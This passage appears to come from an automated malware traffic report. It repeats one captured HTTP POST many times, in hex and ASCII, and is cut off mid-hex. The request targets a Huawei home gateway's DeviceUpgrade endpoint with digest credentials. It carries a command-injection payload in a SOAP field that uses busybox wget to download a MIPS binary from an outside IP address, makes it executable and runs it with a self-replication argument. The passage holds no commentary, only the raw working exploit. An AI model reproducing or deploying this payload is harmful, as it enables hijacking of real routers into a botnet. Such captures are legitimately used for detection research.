61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 